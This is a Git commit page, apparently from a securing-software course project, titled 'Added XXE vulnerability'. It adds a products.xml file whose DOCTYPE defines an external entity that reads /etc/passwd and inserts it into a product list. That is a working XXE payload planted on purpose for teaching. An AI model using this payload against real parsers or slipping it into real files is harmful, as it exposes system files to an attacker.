john/mooc-securing-software-21-projects
1
0
Fork 0
Code Activity

Added XXE vulnerability

Browse Source
This commit is contained in:
John Ahlroos
2021-03-02 20:57:11 +02:00
parent fee6e985c3
commit 1283970bea
6 changed files with 66 additions and 18 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
project1/static/products.xml Normal file
View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<products>
<product>Coffee</product>
<product>Tea</product>
<product>Chocholate</product>
<product>&xxe;</product>
</products>